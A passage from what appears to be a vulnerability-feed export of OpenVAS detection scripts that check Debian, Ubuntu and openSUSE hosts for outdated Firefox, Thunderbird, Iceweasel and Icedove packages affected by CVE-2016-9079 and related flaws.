res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-si\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-sk\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-sl\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-son\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-sq\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-sr\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-sv-se\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ta\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-te\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-th\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-tr\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-uk\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-uz\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-vi\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-xh\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-cn\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-tw\", ver:\"45.5.1esr-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-31T18:34:19", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-05T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for MozillaFirefox (openSUSE-SU-2016:2994-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079", "CVE-2016-9078"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851441", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851441", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851441\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-12-05 05:42:56 +0100 (Mon, 05 Dec 2016)\");\n script_cve_id(\"CVE-2016-9078\", \"CVE-2016-9079\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for MozillaFirefox (openSUSE-SU-2016:2994-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'MozillaFirefox'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"MozillaFirefox is updated to version 50.0.2 which fixes the following\n issues:\n\n * Firefox crashed with 3rd party Chinese IME when using IME text (fixed\n in version 50.0.1)\n\n * Redirection from an HTTP connection to a data: URL could inherit wrong\n origin after an HTTP redirect (fixed in version 50.0.1, bmo#1317641,\n MFSA 2016-91, boo#1012807, CVE-2016-9078)\n\n * Maliciously crafted SVG animations could cause remote code execution\n (fixed in version 50.0.2, bmo#1321066, MFSA 2016-92, boo##1012964,\n CVE-2016-9079)\");\n\n script_tag(name:\"affected\", value:\"MozillaFirefox on openSUSE Leap 42.1, openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:2994-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~50.0.2~91.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-branding-upstream\", rpm:\"MozillaFirefox-branding-upstream~50.0.2~91.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-buildsymbols\", rpm:\"MozillaFirefox-buildsymbols~50.0.2~91.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-debuginfo\", rpm:\"MozillaFirefox-debuginfo~50.0.2~91.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-debugsource\", rpm:\"MozillaFirefox-debugsource~50.0.2~91.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-devel\", rpm:\"MozillaFirefox-devel~50.0.2~91.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-translations-common\", rpm:\"MozillaFirefox-translations-common~50.0.2~91.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-translations-other\", rpm:\"MozillaFirefox-translations-other~50.0.2~91.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "openvas", "title": "Ubuntu Update for firefox USN-3140-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9079", "CVE-2016-9078"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842969", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842969", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for firefox USN-3140-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842969\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-01 05:39:18 +0100 (Thu, 01 Dec 2016)\");\n script_cve_id(\"CVE-2016-9078\", \"CVE-2016-9079\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for firefox USN-3140-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that data: URLs can inherit\n the wrong origin after a HTTP redirect in some circumstances. An attacker could\n potentially exploit this to bypass same-origin restrictions. (CVE-2016-9078)\n\nA use-after-free was discovered in SVG animations. If a user were tricked\nin to opening a specially crafted website, an attacker could exploit this\nto cause a denial of service via application crash, or execute arbitrary\ncode. (CVE-2016-9079)\");\n script_tag(name:\"affected\", value:\"firefox on Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS,\n Ubuntu 16.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3140-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3140-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS|16\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"firefox\", ver:\"50.0.2+build1-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"firefox\", ver:\"50.0.2+build1-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"firefox\", ver:\"50.0.2+build1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"firefox\", ver:\"50.0.2+build1-0ubuntu0.16.10.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:33", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-01T00:00:00", "type": "openvas", "title": "Ubuntu Update for thunderbird USN-3141-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5290", "CVE-2016-5297", "CVE-2016-5296", "CVE-2016-9079", "CVE-2016-5291", "CVE-2016-9066"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842967", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842967", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for thunderbird USN-3141-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842967\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-01 05:39:07 +0100 (Thu, 01 Dec 2016)\");\n script_cve_id(\"CVE-2016-5290\", \"CVE-2016-5291\", \"CVE-2016-5296\", \"CVE-2016-5297\", \"CVE-2016-9066\", \"CVE-2016-9079\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for thunderbird USN-3141-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'thunderbird'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Christian Holler, Jon Coppeard, Olli Pettay,\n Ehsan Akhgari, Gary Kwong, Tooru Fujisawa, and Randell Jesup discovered multiple\n memory safety issues in Thunderbird. If a user were tricked in to opening a\n specially crafted message, an attacker could potentially exploit these to cause a\n denial of service via application crash, or execute arbitrary code. (CVE-2016-5290)\n\nA same-origin policy bypass was discovered with local HTML files in some\ncircumstances. An attacker could potentially exploit this to obtain\nsensitive information. (CVE-2016-5291)\n\nA heap buffer-overflow was discovered in Cairo when processing SVG\ncontent. If a user were tricked in to opening a specially crafted message,\nan attacker could potentially exploit this to cause a denial of service\nvia application crash, or execute arbitrary code. (CVE-2016-5296)\n\nAn error was discovered in argument length checking in Javascript. If a\nuser were tricked in to opening a specially crafted website in a browsing\ncontext, an attacker could potentially exploit this to cause a denial of\nservice via application crash, or execute arbitrary code. (CVE-2016-5297)\n\nA buffer overflow was discovered in nsScriptLoadHandler. If a user were\ntricked in to opening a specially crafted website in a browsing context,\nan attacker could potentially exploit this to cause a denial of service\nvia application crash, or execute arbitrary code. (CVE-2016-9066)\n\nA use-after-free was discovered in SVG animations. If a user were tricked\nin to opening a specially crafted website in a browsing context, an\nattacker could exploit this to cause a denial of service via application\ncrash, or execute arbitrary code. (CVE-2016-9079)\");\n script_tag(name:\"affected\", value:\"thunderbird on Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS,\n Ubuntu 16.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3141-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3141-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS|16\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:45.5.1+build1-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:45.5.1+build1-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:45.5.1+build1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:45.5.1+build1-0ubuntu0.16.10.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:54:47", "description": "Multiple security issues have been found\nin Icedove, Debian", "cvss3": {}, "published": "2016-12-11T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3730-1 (icedove - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5290", "CVE-2016-5297", "CVE-2016-5296", "CVE-2016-9079", "CVE-2016-5291", "CVE-2016-9074", "CVE-2016-9066"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703730", "href": "http://plugins.openvas.org/nasl.php?oid=703730", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3730.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3730-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703730);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-5290\", \"CVE-2016-5291\", \"CVE-2016-5296\", \"CVE-2016-5297\",\n \"CVE-2016-9066\", \"CVE-2016-9074\", \"CVE-2016-9079\");\n script_name(\"Debian Security Advisory DSA 3730-1 (icedove - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-12-11 00:00:00 +0100 (Sun, 11 Dec 2016)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3730.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"icedove on Debian Linux\");\n script_tag(name: \"insight\", value: \"Icedove is an unbranded Thunderbird mail\nclient suitable for free distribution. It supports different mail accounts (POP,\nIMAP, Gmail), has an integrated learning Spam filter, and offers easy organization\nof mails with tagging and virtual folders. Also, more features can be added by\ninstalling extensions.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 1:45.5.1-1~deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1:45.5.1-1 or earlier.\n\nWe recommend that you upgrade your icedove packages.\");\n script_tag(name: \"summary\", value: \"Multiple security issues have been found\nin Icedove, Debian's version of the Mozilla Thunderbird mail client: Multiple memory\nsafety errors, same-origin policy bypass issues, integer overflows, buffer overflows\nand use-after-frees may lead to the execution of arbitrary code or\ndenial of service.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"calendar-google-provider\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-dbg\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-dev\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-all\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-ar\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-ast\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-be\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-bg\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-bn-bd\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-br\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-ca\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-cs\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-da\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-de\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-el\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-en-gb\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-es-ar\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-es-es\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-et\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-eu\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-fi\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-fr\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-fy-nl\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-ga-ie\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-gd\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-gl\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-he\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-hr\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-hu\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-hy-am\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-id\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-is\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"icedove-l10n-it\", ver:\"1:45.5.1-1~deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif 